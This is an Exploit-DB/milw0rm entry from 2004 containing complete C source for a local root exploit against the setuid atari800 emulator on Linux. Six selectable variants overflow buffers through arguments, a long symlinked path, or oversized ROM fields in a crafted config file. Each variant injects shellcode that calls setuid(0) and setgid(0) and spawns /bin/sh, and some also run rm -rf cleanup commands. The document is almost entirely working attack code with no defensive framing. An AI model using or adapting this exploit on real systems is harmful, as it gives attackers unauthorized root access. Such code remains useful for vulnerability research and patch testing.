atari800 - Local Privilege Escalation

EDB-ID:

657

CVE:


Author:

pi3

Type:

local

Platform:

Linux

Published:

2004-11-25

/*
* Exploit for atari800 by pi3 (pi3ki31ny)
*
* pi3@pi3:~$ ./p
*
*         ...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...
*
*         Ussage:
*         [+] ./p [options]
*
*             -? <this help screen>
*             -v choose a bug:
*                    1 - first bug    (in all versions Atari800)
*                    2 - second bug   (in older Atari800 - modiy argv[0])
*                    3 - third bug    (in config file - OS/A_ROM)
*                    4 - fourth bug   (in config file - OS/B_ROM)
*                    5 - fifth bug    (in config file - XL/XE_ROM)
*                    6 - sixth bug    (in config file - BASIC_ROM)
*             -o <offset>
*             -p PATH
*
* pi3@pi3:~$
*
* Atari800 have suid bit in default instalation.
* Best regards pi3 (pi3ki31ny).
*
* "Kazdemu trafi sie gowno...!"
*
* Greetz: [greetz on my web] && other my friends (you know who you are)
*
*         ...::: -=[ www.pi3.int.pl ]=- :::...
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <assert.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define PATH "/usr/local/bin/atari800"
#define DIRS 256
#define CONFIG ".atari800.cfg"

/*    ...::: -=[ www.pi3.int.pl ]=- :::...    */

char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"
                  "\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"
                  "\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"
                  "\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"
                  "\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"
                  "\x80"

/*    setuid(0)    */

                  "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"

/*    setgid(0)    */

                  "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"

/*    exec /bin/sh    */

                  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                  "\x80"

/*    exit(0)    */

                  "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

long ret_ad(char *a1, char *a2) {

//   return (0xbffffffa-strlen(a1)-strlen(a2));
    return 0xbfffee01;
}

int ussage(char *arg) {

  printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
  printf("\n\tUssage:\n\t[+] %s [options]\n
           -? <this help screen>
           -v choose a bug:
                  1 - first bug    (in all versions Atari800)
                  2 - second bug   (in older Atari800 - modiy argv[0])
                  3 - third bug    (in config file - OS/A_ROM)
                  4 - fourth bug   (in config file - OS/B_ROM)
                  5 - fifth bug    (in config file - XL/XE_ROM)
                  6 - sixth bug    (in config file - BASIC_ROM)
           -o <offset>
           -p PATH\n\n",arg);
  exit(-1);
}

int main(int argc, char *argv[]) {

  long ret,*buf_addr;
  char envp[8196],*path=PATH;
  static char *sh[0x02];
  char buf[DIRS],link[500],conf[5000];
  int i,opt,op2=0,offset=0;
  FILE *fp;

  while((opt = getopt(argc,argv,"p:o:v:?")) != -1) {
        switch(opt) {

         case 'o':

           offset=atoi(optarg);
           break;

         case 'p':

           path=optarg;
           break;

         case 'v':

           op2=atoi(optarg);
           break;

         case '?':
         default:

           ussage(argv[0]);
           break;
        }
  }

  if (op2==0)
    ussage(argv[0]);

  if ( (fp=fopen(path,"r"))==NULL) {
     printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);
     ussage(argv[0]);
  } fclose(fp);

  if ( (fp=fopen(CONFIG,"r"))==NULL) {
     if ( (fp=fopen(CONFIG,"w"))==NULL) {
        printf("I can\'t create config file!\n");
        exit(-1);
     }
     printf("\nCreating config file...\n\n\n");
     fprintf(fp,"Atari 800 Emulator, Version 1.3.0\n");
     fprintf(fp,"OS/A_ROM=atariosa.rom\n");
     fprintf(fp,"OS/B_ROM=atariosb.rom\n");
     fprintf(fp,"XL/XE_ROM=atarixl.rom\n");
     fprintf(fp,"BASIC_ROM=ataribas.rom\n");
     fprintf(fp,"5200_ROM=\n");
     fprintf(fp,"DISK_DIR=.\n");
     fprintf(fp,"ROM_DIR=.\n");
     fprintf(fp,"H1_DIR=\n");
     fprintf(fp,"H2_DIR=\n");
     fprintf(fp,"H3_DIR=\n");
     fprintf(fp,"H4_DIR=\n");
     fprintf(fp,"HD_READ_ONLY=1\n");
     fprintf(fp,"EXE_DIR=\n");
     fprintf(fp,"STATE_DIR=\n");
     fprintf(fp,"PRINT_COMMAND=lpr %s\n");
     fprintf(fp,"SCREEN_REFRESH_RATIO=1\n");
     fprintf(fp,"MACHINE_TYPE=Atari XL/XE\n");
     fprintf(fp,"RAM_SIZE=64\n");
     fprintf(fp,"DEFAULT_TV_MODE=PAL\n");
     fprintf(fp,"DISABLE_BASIC=1\n");
     fprintf(fp,"ENABLE_SIO_PATCH=1\n");
     fprintf(fp,"ENABLE_H_PATCH=1\n");
     fprintf(fp,"ENABLE_P_PATCH=1\n");
     fprintf(fp,"ENABLE_NEW_POKEY=1\n");
     fprintf(fp,"STEREO_POKEY=0\n");
  } fclose(fp);

  if (op2==1) {

     printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
     printf("\n\t[+] Bulding buffors!\n");

     ret=ret_ad(shellcode,path);
     ret+=offset;

     printf("\t[+] Using adres 0x%x\n",ret);
     printf("\t[+] Using first bug in Atari800\n");

     memset(envp,0x90,sizeof(envp));
     for (i=0; i<strlen(shellcode); i++)
       envp[8196-strlen(shellcode)+i] = shellcode[i];
     sh[0x00]=envp;
     sh[0x01]=NULL;

     strcpy(link,"AA");
     buf_addr=(long*)&link[2];
     for(i=0;i<500;i+=4)
       *(buf_addr)++ = ret;

     link[499]='\0';
     printf("\nExecuting the vuln program - %s\n\n",PATH);
     execle(PATH,PATH,link,0,sh);
     printf("Kazdemu trafi sie gowno...!\n");
     return 0;
  } else if (op2==2) {

     system("rm -rf `perl -e 'print \"\\x41\"x250'`; rm -f 1");

     printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
     printf("\n\t[+] Bulding buffors!\n");

     ret=ret_ad(shellcode,path);
     ret+=offset;

     printf("\t[+] Using adres 0x%x\n",ret);
     printf("\t[+] Using second bug in Atari800\n");

     memset(envp,0x90,sizeof(envp));
     for (i=0; i<strlen(shellcode); i++)
       envp[8196-strlen(shellcode)+i] = shellcode[i];
     sh[0x00]=envp;
     sh[0x01]=NULL;

     memset(buf,0x41,(size_t)250);
     strcpy(link,"./");
     memset(&link[2],0x41,(size_t)252);
     assert(mkdir(buf, 0755) != -1);
     assert(chdir(buf) != -1);

     buf_addr=(long*)buf;
     for (i=0; i<80; i+=4)
       *(buf_addr)++ = ret;
     buf[80]='\0';
     //   snprintf(link+252,500,"/`perl -e \'print \"\\x01\\xee\\xff\\xbf\"x20\'` pi3");
     snprintf(link+252,500,"/%s",buf);
     assert(symlink(path, buf) != -1);
     assert(chdir("../") != -1);

     printf("\nExecuting the vuln program - %s\n\n",link);
     // system(link);
     execle(link,link,"pi3",0,sh);
     printf("Kazdemu trafi sie gowno...!\n");
     return 0;
  } else if (op2==3) {

     printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
     printf("\n\t[+] Bulding buffors!\n");

     ret=ret_ad(shellcode,path);
     ret+=offset;

     printf("\t[+] Using adres 0x%x\n",ret);
     printf("\t[+] Using third bug in Atari800\n");

     memset(envp,0x90,sizeof(envp));
     for (i=0; i<strlen(shellcode); i++)
       envp[8196-strlen(shellcode)+i] = shellcode[i];
     sh[0x00]=envp;
     sh[0x01]=NULL;

     strcpy(conf,"AA");
     buf_addr=(long*)&conf[2];
     for(i=0;i<5000;i+=4)
       *(buf_addr)++ = ret;

     conf[4999]='\0';
     system("rm -rf .pi3.conf");
     if ( (fp=fopen(".pi3.conf","w")) == NULL) {
        printf("I can\'t create config file!\nExiting...\n");
        exit(-1);
     }
     fprintf(fp,"OS/A_ROM=%s\n",conf);
     printf("\nExecuting the vuln program - %s\n\n",PATH);
     execle(PATH,PATH,"-config",".pi3.conf",0,sh);
     printf("Kazdemu trafi sie gowno...!\n");
     return 0;
  } else if (op2==4) {

     printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
     printf("\n\t[+] Bulding buffors!\n");

     ret=ret_ad(shellcode,path);
     ret+=offset;

     printf("\t[+] Using adres 0x%x\n",ret);
     printf("\t[+] Using fourth bug in Atari800\n");

     memset(envp,0x90,sizeof(envp));
     for (i=0; i<strlen(shellcode); i++)
       envp[8196-strlen(shellcode)+i] = shellcode[i];
     sh[0x00]=envp;
     sh[0x01]=NULL;

     strcpy(conf,"AA");
     buf_addr=(long*)&conf[2];
     for(i=0;i<5000;i+=4)
       *(buf_addr)++ = ret;

     conf[4999]='\0';
     system("rm -rf .pi3.conf");
     if ( (fp=fopen(".pi3.conf","w")) == NULL) {
        printf("I can\'t create config file!\nExiting...\n");
        exit(-1);
     }
     fprintf(fp,"OS/B_ROM=%s\n",conf);
     printf("\nExecuting the vuln program - %s\n\n",PATH);
     execle(PATH,PATH,"-config",".pi3.conf",0,sh);
     printf("Kazdemu trafi sie gowno...!\n");
     return 0;
  } else if (op2==5) {

     printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
     printf("\n\t[+] Bulding buffors!\n");

     ret=ret_ad(shellcode,path);
     ret+=offset;

     printf("\t[+] Using adres 0x%x\n",ret);
     printf("\t[+] Using fifth bug in Atari800\n");

     memset(envp,0x90,sizeof(envp));
     for (i=0; i<strlen(shellcode); i++)
       envp[8196-strlen(shellcode)+i] = shellcode[i];
     sh[0x00]=envp;
     sh[0x01]=NULL;

     strcpy(conf,"A");
     buf_addr=(long*)&conf[1];
     for(i=0;i<5000;i+=4)
       *(buf_addr)++ = ret;

     conf[4999]='\0';
     system("rm -rf .pi3.conf");
     if ( (fp=fopen(".pi3.conf","w")) == NULL) {
        printf("I can\'t create config file!\nExiting...\n");
        exit(-1);
     }
     fprintf(fp,"XL/XE_ROM=%s\n",conf);
     printf("\nExecuting the vuln program - %s\n\n",PATH);
     execle(PATH,PATH,"-config",".pi3.conf",0,sh);
     printf("Kazdemu trafi sie gowno...!\n");
     return 0;
  } else if (op2==6) {

     printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
     printf("\n\t[+] Bulding buffors!\n");

     ret=ret_ad(shellcode,path);
     ret+=offset;

     printf("\t[+] Using adres 0x%x\n",ret);
     printf("\t[+] Using sixth bug in Atari800\n");

     memset(envp,0x90,sizeof(envp));
     for (i=0; i<strlen(shellcode); i++)
       envp[8196-strlen(shellcode)+i] = shellcode[i];
     sh[0x00]=envp;
     sh[0x01]=NULL;

     strcpy(conf,"A");
     buf_addr=(long*)&conf[1];
     for(i=0;i<5000;i+=4)
       *(buf_addr)++ = ret;

     conf[4999]='\0';
     system("rm -rf .pi3.conf");
     if ( (fp=fopen(".pi3.conf","w")) == NULL) {
        printf("I can\'t create config file!\nExiting...\n");
        exit(-1);
     }
     fprintf(fp,"BASIC_ROM=%s\n",conf);
     printf("\nExecuting the vuln program - %s\n\n",PATH);
     execle(PATH,PATH,"-config",".pi3.conf",0,sh);
     printf("Kazdemu trafi sie gowno...!\n");
     return 0;
  }
}

// milw0rm.com [2004-11-25]